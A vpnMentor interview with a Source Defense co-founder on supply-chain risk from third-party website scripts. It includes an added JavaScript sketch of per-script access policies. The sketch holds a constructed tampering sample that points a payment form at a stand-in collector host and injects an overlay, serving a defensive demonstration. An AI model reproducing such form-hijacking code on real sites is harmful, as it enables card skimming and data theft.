We review vendors based on rigorous testing and research but also take into account your feedback and our affiliate commission with providers. Some providers are owned by our parent company.
vpnMentor was established in 2014 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, and Private Internet Access which may be ranked and reviewed on this website. The reviews published on vpnMentor are believed to be accurate as of the date of each article, and written according to our strict reviewing standards that prioritize the independent, professional and honest examination of the reviewer, taking into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings and reviews we publish may also take into consideration the common ownership mentioned above, and affiliate commissions we earn for purchases through links on our website. We do not review all VPN providers and information is believed to be accurate as of the date of each article.

3rd Party Scripts Are Jeopardizing Your Business, Source Defense is Here to Help

Ditsa Keren Technology Researcher

Source Defense is the first and only company to offer a real-time SaaS solution that protects websites from vulnerabilities introduced through the website supply chain. We interviewed VP Product and co-founder Avital Grushcovski to understand the problem with third-party scripts and how it can be avoided. Here's what we found.

What is your main objective at Source Defense?

Websites today typically operate with many third-party vendor scripts integrated into the website. These scripts are designed to enable rich content capability and provide measures of website performance and efficiency. These include analytics, advertising, chat services, social media applications, etc. However, they introduce a problem, because they function outside of the website security perimeter, which is focused on the communication between the user and the website server. This security generally includes firewalls and WAFs, which focus on protecting the server side of the website session.

These third-party scripts operate outside of this security perimeter and introduce a very real client-side vulnerability that is not currently addressed. These scripts are designed to communicate with remote servers which are managed by third-party service providers, completely external to the organization's security infrastructure. Some of the big names include Google and Facebook, but many smaller third-party vendors offer compelling capabilities that are broadly deployed and enhance web experience or enrich analytics.

Unfortunately, when these third-party vendors are compromised, the resultant attacks can, in turn, compromise all of the organizations that have integrated the services of this third-party vendor. We've seen many recent examples of this attack type, including the April 2018 breach of Delta, Best Buy, Sears and Kmart that originated from the compromised service of a reputable third-party vendor, whose JavaScript they had all deployed on their websites. A significant volume of credit card data was stolen, which has resulted in significant remediation costs and reputational damage to these prominent vendors.

Consider that the origin of JavaScript has no effect on the level of access it has to the page: every script can add or remove data from the page, perform unwanted actions and even record keystrokes as the user types them. The lack of control over how JavaScript is designed to function makes third-party JS an increasingly popular attack vector for hackers.

Today’s solutions are focused around “detecting” this problem post-breach. Source Defense has architected an entirely new approach, introducing a paradigm shift focused on preventing this type of attack in real time through a first-of-its-kind isolation and segmentation technology. Source Defense’s cloud-based SaaS solution allows administrators to assign default or highly customizable policies to every third-party script operating on their webpage.

As an example, an analytics plugin tool can be controlled to ensure it has read-only access to the webpage content.  Should this tool become compromised, the assigned policy permissions, deployed via Source Defense, will ensure that malicious activities like adding unwanted content are prevented. Similarly, an ad service, once protected by Source Defense, will only be able to display ads in their designated areas and not be able to create any malicious phishing overlays.

The Source Defense solution was purposefully built for deployment and administration simplicity. Machine intelligence is leveraged to evaluate deployed third-party scripts and assign default policies per third-party service. Additionally, ongoing administration is extremely low, requiring little oversight beyond accepting policies for newly deployed third-party scripts. Machine learning ensures that these default policies are generally effective. However, these policies may be customized if required.

We consider the Source Defense solution as both a compelling security solution as well as a critical business enablement tool.  It allows organizations to quickly and securely deploy third-party tools that enable rich content and capability to their websites.
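The per-script policy idea described above (read-only access for an analytics script, a designated area for an ad service) can be modelled in a few lines of JavaScript. This is an added illustration, not Source Defense's code and not part of the interview. The page object, the policy table and the `guard` function are hypothetical, and a same-context `Proxy` models only the policy decision, not real isolation.

```javascript
'use strict';
// Constructed stand-in for page state; a real page would expose the DOM.
function makePage() {
  return { form: { cardNumber: '4111-CONSTRUCTED', action: '/pay' },
           slots: { adBanner: '' } };
}

// Hypothetical per-script policies modelled on the two cases in the interview.
const POLICIES = {
  analytics: { writable: [] },                  // read-only
  adService: { writable: ['slots.adBanner'] },  // may fill its own slot only
};

// Wrap `target` so every mutation is checked against the script's policy.
function guard(target, script, denied, path = '') {
  const deny = (op, key) => denied.push(`${script}: ${op} ${path}${String(key)}`);
  return new Proxy(target, {
    get(obj, key) {
      const v = obj[key];
      // Wrap nested objects too, or page.form.action = ... would skip the check.
      return v !== null && typeof v === 'object'
        ? guard(v, script, denied, `${path}${String(key)}.`) : v;
    },
    set(obj, key, value) {
      if (POLICIES[script].writable.includes(path + String(key))) obj[key] = value;
      else deny('write', key);
      return true; // a denied write is dropped and recorded, not thrown
    },
    deleteProperty(obj, key) { deny('delete', key); return true; },
    defineProperty(obj, key) { deny('define', key); return false; },
  });
}

// Constructed sample of a third-party script that starts tampering with the page.
function tamperingScript(page) {
  page.form.action = 'https://collector.example/';
  page.slots.adBanner = '<div>ad</div>';
  page.overlay = '<div>overlay</div>';
}

// Run the sample with full access (policy = null) or under a named policy.
function runUnder(policy) {
  const page = makePage(), denied = [];
  tamperingScript(policy ? guard(page, policy, denied) : page);
  return { page, denied };
}
```

Under `analytics` all three writes are dropped and listed in `denied`; under `adService` only the banner write goes through. Reads are not restricted in this sketch, so a read-only policy here limits tampering rather than data exposure.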

How has the transition from analog to digital changed the game for financial institutions?

If you look at financial websites ten years ago, you'd see few, if any, third-party scripts operating on corporate websites. Today, third-party integrations are commonly deployed. The typical bank will have 20-40 third-party scripts operating simultaneously.

Security teams constantly struggle with the challenge of quickly activating the capabilities of these third-party vendors while ensuring the security of the website.

Financial organizations often choose to integrate third-party services onto their websites from well-known and established vendors, because they consider them more secure. This creates conflict between the marketing and security teams because innovative new tools often require extended security validation and jeopardize time to market.

Tag management platforms enable seamless addition of scripts to web pages with a simple user interface. When financial institutions put these tools in the wrong hands, the goal of enhancing efficiency may come at great cost due to the exposure to non-validated scripts and tools introduced to organizations.

Financial institutions protected by Source Defense can confidently deploy third-party tools to their websites without exposing their organizations to vulnerabilities introduced by their scripts.  These tools can be implemented quickly and securely.

As blockchain technology is gaining popularity, how would you advise financial entrepreneurs to protect their user data?

Source Defense advises paying increased attention and care to vulnerabilities appearing on the client (browser) side. These developing websites may handle large transactions, and uncontrolled third-party scripts running on web pages can lead to significant losses. My recommendation would be to either implement a solution capable of managing these third-party entities or limit their use as much as possible.

In your opinion, should the Internet be regulated? How?

I don't think the Internet should not be regulated.  However, this answer depends on a discussion of "regulated". There's a great risk that simple regulation will evolve very quickly to censorship. That said, I do believe that there are websites that should be taken down and handled. I wouldn’t have ISPs blocking applications, because that's a very slippery slope.  However, it's clear that some sort of investigative authority should be funded and supported by governments to avoid some of the unfortunate content and transactions that are enabled by an unmonitored Internet.

What can you tell us about Source Defense's future plans?

We're a fast-growing startup with a first-of-its-kind solution that addresses a very compelling and real threat vector that nearly every organization with a website faces today. Many recent breaches have highlighted the need for this solution. As such, we are engaged in multiple pilots with large multinational organizations and Fortune 500 companies. Our future will see Source Defense expand more deeply into privacy and security, expand integrations and expand support for key compliance requirements like those evident in GDPR. We will remain steadfast in our core goal of assisting organizations with secure business enablement.

We plan to open our new headquarters in the US and plan to significantly grow operations there in the near future.


About the Author

Ditsa Keren is a cybersecurity expert with a keen interest in technology and digital privacy.
